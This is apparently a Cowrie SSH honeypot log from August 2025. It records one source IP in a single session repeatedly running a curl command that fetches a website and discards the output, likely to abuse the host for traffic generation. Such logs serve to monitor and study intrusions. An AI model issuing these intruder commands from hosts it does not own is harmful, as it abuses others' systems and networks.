{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:39.583981Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:39.626726Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:39.627663Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:39.664312Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:39.665531Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:39.702639Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:39.703609Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:39.740320Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:39.741210Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:39.794166Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:39.795081Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:39.854899Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:39.855892Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:39.896303Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:39.897165Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:39.952628Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:39.953549Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:39.990544Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:39.991427Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:40.029357Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:40.030205Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:40.069653Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:40.070596Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:40.117735Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:40.118572Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:40.164611Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:40.165490Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:40.207198Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:40.208033Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:40.244875Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:40.245806Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:40.282282Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:40.283467Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:40.320499Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:40.321512Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:40.368385Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:40.369229Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:40.405522Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:40.406621Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:40.443017Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:40.443939Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:40.480477Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:40.481308Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:40.518106Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:40.519281Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:40.556433Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:40.557375Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:40.594058Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:40.595059Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:40.631892Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:40.632847Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:40.671202Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:40.672091Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:40.708914Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:40.709919Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:40.760240Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:40.761118Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:40.799526Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:40.800412Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:40.836612Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:40.837450Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:40.875712Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:40.876565Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:40.912779Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:40.913594Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:40.952727Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:40.953596Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:40.993071Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:40.993924Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:41.033045Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:41.033974Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:41.070790Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:41.071677Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:41.109156Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:41.109999Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:41.156915Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:41.157847Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:41.195092Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:41.196289Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:41.233127Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:41.233974Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:41.270715Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:41.271631Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:41.308707Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:41.309853Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:41.352050Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:41.353032Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:41.389717Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:41.390649Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:41.427499Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:41.429000Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:41.468178Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:41.469222Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:41.509730Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:41.510772Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:41.557975Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:41.559012Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:41.595660Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:41.596672Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:41.634514Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:41.635578Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:41.672379Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:41.673450Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:41.710283Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:41.711283Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:41.748236Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:41.749511Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:41.792082Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:41.793142Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:41.829664Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:41.830644Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:41.869216Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:41.870492Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:41.908772Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:41.909809Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:42.093739Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:42.094835Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:42.132461Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:42.133735Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:42.170817Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:42.171819Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:42.208809Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:42.209821Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:42.246875Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:42.248768Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:42.286138Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:42.287183Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:42.324378Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:42.325409Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:42.362337Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
